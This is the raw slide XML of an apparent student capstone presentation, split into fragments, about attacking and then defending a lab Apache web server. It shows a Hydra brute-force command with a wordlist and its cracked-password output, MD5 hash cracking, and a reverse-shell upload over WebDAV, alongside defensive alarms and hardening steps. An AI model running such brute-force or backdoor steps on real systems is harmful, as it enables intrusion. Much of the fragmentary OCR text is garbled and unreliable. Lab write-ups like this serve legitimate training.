          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="201334" y="2216812"/>
            <a:ext cx="7965000" cy="3588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6"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1215" name="Google Shape;1215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2935" y="2738750"/>
            <a:ext cx="4880365" cy="217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21" name="Google Shape;1221;p68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22" name="Google Shape;1222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68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4" name="Google Shape;1224;p68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400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>30,584 total requests were made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400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>30,582 requests were made before the password was discovered</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1225" name="Google Shape;122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27" name="Google Shape;1227;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="36964" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="22850" y="1467775"/>
            <a:ext cx="9098293" cy="12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850" y="2778850"/>
            <a:ext cx="7680300" cy="209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9" name="Google Shape;1229;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182000" y="2103864"/>
            <a:ext cx="8314500" cy="2841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6"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1230" name="Google Shape;1230;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731850" y="4400125"/>
            <a:ext cx="7680300" cy="2841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6"/>
              </a:highligh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36" name="Google Shape;1236;p69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37" name="Google Shape;1237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69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Add a screenshot of Kibana logs depicting the WebDAV connection.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39" name="Google Shape;123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Google Shape;1240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10 HTTP -1•十“믈•1*|1 ECS &#10;9216홀1.1051'″)因 m•.,O년~-니0* &#10;hug: 1/,9216올 1105t 19216회-1 %,Camp믈|까」國리회 secret」Older &#10;h테p;h19216되,1051 " id="1241" name="Google Shape;1241;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="33870" l="0" r="0" t="-7857"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467775"/>
            <a:ext cx="8409300" cy="215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2" name="Google Shape;1242;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="3259189"/>
            <a:ext cx="8314500" cy="2841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6"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243" name="Google Shape;1243;p69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400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10 requests were made to this directory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400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd.dav was situated inside the directory, and this is also where we uploaded our reverse shell file.</a:t>
            </a:r>
            <a:endParaRPr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8" name="Google Shape;1248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49" name="Google Shape;1249;p70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50" name="Google Shape;1250;p7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251" name="Google Shape;1251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57" name="Google Shape;1257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71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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An alert on any traffic on port 4444 and non-standard/utilized ports</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1second  - when  port 4444 is receiving packets from a single source server. IDS logs the event</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5 events/ 1 minute = An alarm sent to Security Manager. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1259" name="Google Shape;1259;p7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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewall rules that only allow outgoing traffic from certain ports</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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D7E74"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="1D7E74"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A firewall that blocks all incoming and outgoing ports except the needed ports  80 and 443.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="1D7E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>
              <a:solidFill>
                <a:srgbClr val="00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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sudo firewall - cmd -- permanent -- add --      rich - rule = “rule family = ‘ipv4’ source address = ‘192.168.1.8 ‘ reject</a:t>
            </a:r>
            <a:endParaRPr sz="140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60" name="Google Shape;1260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66" name="Google Shape;1266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72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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alarm when there is attempt to access files outside of company hours</a:t>
            </a:r>
            <a:endParaRPr sz="140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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alarm when there are attempts to access directory from unrecognized devices</a:t>
            </a:r>
            <a:endParaRPr sz="140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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 3 Attempts</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1268" name="Google Shape;1268;p7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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP Whitelisting authorized family member devices.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Single Sign-on (SSO) for family members</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 factor authentication for directory access</a:t>
            </a:r>
            <a:endParaRPr sz="140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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Self-managed password expiry for family requiry directory access </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ chage -M 15</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1269" name="Google Shape;1269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32" name="Google Shape;1032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4" name="Google Shape;1034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0" name="Google Shape;1040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41" name="Google Shape;1041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42" name="Google Shape;1042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3" name="Google Shape;1043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44" name="Google Shape;1044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45" name="Google Shape;1045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6" name="Google Shape;1046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7" name="Google Shape;1047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1" name="Google Shape;1051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2" name="Google Shape;1052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3" name="Google Shape;1053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75" name="Google Shape;1275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73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="16554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brute force attacks?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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alarm when source IPs are exceeding threshold of rejected or invalid logins</a:t>
            </a:r>
            <a:endParaRPr sz="140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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5 attempts for each IP</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1277" name="Google Shape;1277;p7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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lock out IP addresses after a defined number of incorrect attempts, for a specific period of time. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After 3-4 failed login attempts, prompt for security questions or other authentication methods.</a:t>
            </a:r>
            <a:endParaRPr sz="140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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ sudo passwd - l user_name</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To lock user’s account</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1278" name="Google Shape;1278;p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84" name="Google Shape;1284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74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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alarm when IDS detects traffic targeting vulnerabilities in the windows based operating system.</a:t>
            </a:r>
            <a:endParaRPr sz="140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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1 occurrence </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker can change web pages and gain sufficient access to take complete control of your server.</a:t>
            </a:r>
            <a:endParaRPr sz="140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86" name="Google Shape;1286;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1435025"/>
            <a:ext cx="4482000" cy="34716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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is a high severity/medium visibility vulnerability. An extension, it is highly recommended that you remove it.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Else, utilize the security tools available with Apache, 2 Factor Authentication or WiKID to set up secure remote drives</a:t>
            </a:r>
            <a:endParaRPr sz="140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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache can be configured for SSL to encrypt the data in transfer:</a:t>
            </a:r>
            <a:endParaRPr sz="140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FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Openssl genrsa -out webdav.mydomain.com. Key 1024</a:t>
            </a:r>
            <a:endParaRPr sz="140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87" name="Google Shape;1287;p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93" name="Google Shape;1293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75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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An alarm when there is an attempt to upload a file that is outside of established file convention, i.e maximum file length and size, file name length.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An alarm when there is attempt to upload a file from an external IP address</a:t>
            </a:r>
            <a:endParaRPr sz="140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                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 Attempts</a:t>
            </a:r>
            <a:endParaRPr sz="140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95" name="Google Shape;1295;p75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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A whitelist of allowed file types</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The directory to which files are uploaded should be outside of the root</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Require authentication to upload new files.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="1D7E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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a firewall setting blocking outgoing traffic to certain IP addresses</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1296" name="Google Shape;1296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2" name="Google Shape;1302;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293050" y="3648300"/>
            <a:ext cx="243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We Found The Flag !!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303" name="Google Shape;130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050" y="4048500"/>
            <a:ext cx="5101601" cy="95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BY:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Google Shape;1059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5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Sarah Baist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1062" name="Google Shape;1062;p56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Seth Hudson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063" name="Google Shape;1063;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73475" y="3613625"/>
            <a:ext cx="91686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Billy Smith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1064" name="Google Shape;1064;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2448375"/>
            <a:ext cx="91686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Airrick Moore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1065" name="Google Shape;1065;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="3031000"/>
            <a:ext cx="91440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Felicia Polk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1066" name="Google Shape;1066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5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72" name="Google Shape;1072;p5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73" name="Google Shape;1073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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body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/>
              <a:t>[Insert Here]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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>draw.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> a diagram of the network.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 your diagram to this slide and fill out the data in the sidebar.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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6944775" y="910475"/>
            <a:ext cx="2014500" cy="37626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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.1 - 192.168.1.254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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>255.255.255.0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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.0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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.8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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kali 2018.4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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kali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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.105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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu 18.04.1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.100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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu 18.04.3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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ELK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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.0.0.22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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows 10 Pro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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:ML-RefVm-414096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58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81" name="Google Shape;1081;p5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3" name="Google Shape;108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75" y="910475"/>
            <a:ext cx="6699602" cy="389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8" name="Google Shape;108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Google Shape;1089;p5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90" name="Google Shape;1090;p59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91" name="Google Shape;1091;p5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98" name="Google Shape;1098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99" name="Google Shape;1099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00" name="Google Shape;1100;p60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{F40A595D-43E4-4172-B24C-AAA0383CB2D1}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 (Server1)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876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Web Server -- Victim</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="1D7E7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 (Kali)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192.168.1.8</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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Attacking System</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="1D7E7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Windows Host (ML-RefVm-414096)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Public: 10.0.0.22</a:t>
                      </a:r>
                      <a:endParaRPr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Private: 192.168.1.1</a:t>
                      </a:r>
                      <a:endParaRPr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VM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D7E7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Elk (ELK)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="1D7E7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D7E7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solidFill>
                          <a:srgbClr val="1D7E7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Siem System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01" name="Google Shape;1101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107" name="Google Shape;1107;p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108" name="Google Shape;1108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09" name="Google Shape;1109;p61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{F40A595D-43E4-4172-B24C-AAA0383CB2D1}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solidFill>
                            <a:srgbClr val="1D7E7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Directory was </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="1D7E7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available</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="1D7E7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on Apache Web Server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solidFill>
                            <a:srgbClr val="1D7E7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Able to use the browser to see the directories on the Capstone Apache web server.</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="1D7E7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solidFill>
                            <a:srgbClr val="1D7E7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Files showed user Ashton was the administrator of the directory: /company_folders/secret_folder/</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="1D7E7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Passwords</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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Employees use weak passwords </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF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and have them listed within files on the system.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="FF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 were able to brute force Ashton’s password very quickly using the Hydra command allowing access to the secret folder</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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D7E7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Reverse Shell backdoor</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="1D7E7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Able to upload a script onto the server that we could use to gain access to the target machine.</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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D7E7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 were able to gain backdoor shell access to Capstone Apache web server.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="1D7E7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10" name="Google Shape;1110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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sensitive Data Exposure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116" name="Google Shape;1116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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275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-- Nmap scan of the target IP to determine what, if any, ports were open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-- Hydra-- to crack the password for Ashton and gain access to the connect_to_corp_server.</a:t>
            </a:r>
            <a:endParaRPr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-- Crack Station Website -- to unhash Ryan’s password</a:t>
            </a:r>
            <a:endParaRPr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9" name="Google Shape;1119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20" name="Google Shape;1120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1" name="Google Shape;1121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2" name="Google Shape;1122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23" name="Google Shape;1123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4" name="Google Shape;1124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5" name="Google Shape;1125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With these passwords, we were able to gain access to multiple folders containing sensitive information, including how to access the company server and a hash for Ryan’s password.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7" name="Google Shape;1127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8" name="Google Shape;112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9" name="Google Shape;112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0" name="Google Shape;1130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62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Commands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h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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ydra -l ashton -P /use/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 “/company_folders/secret_folders”</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF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2" name="Google Shape;1132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21 (0/0) &#10;18011http-getl ho St: 192.168.1. IOS login: a Shton &#10;pas s word: leopotdo &#10;ISTATus1 attack finished for 192.168.1.105 (valid pair found) &#10;I Of 1 target successfully co—pleted, I valid password found &#10;Hydra .org/thc-hydra) finished at 2021-05-03 &#10;hydra &#10;ashton &#10;P 'usr/Share/nrdliStS/rOCkyOu. txt •S 80 • &#10;fnlder• &#10;f .vv 192.168.1.1 " id="1133" name="Google Shape;1133;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="25329" l="0" r="0" t="54661"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1911350" y="4430250"/>
            <a:ext cx="6918325" cy="303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ree Password Hash Cracker &#10;Enter up to 20 non-salted hashes, one per line: &#10;d7dadoa5cd7c8376eeb50d69b3ccd352 &#10;I'm not a robot &#10;reCAPTCHA &#10;privacy • Terms &#10;Crack Hashes &#10;Supports: LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, shal, sha224, sha256, sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+ (shal(shal_bin)), &#10;QubesV3.1 BackupDefaults &#10;7dadOa5cd7c8376eeb50d69b3ccd352 &#10;Hash &#10;Not found. &#10;Result &#10;Color Codes: &#10;Exact match, Yellow: Partial match, " id="1134" name="Google Shape;113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7825" y="3342375"/>
            <a:ext cx="2468501" cy="946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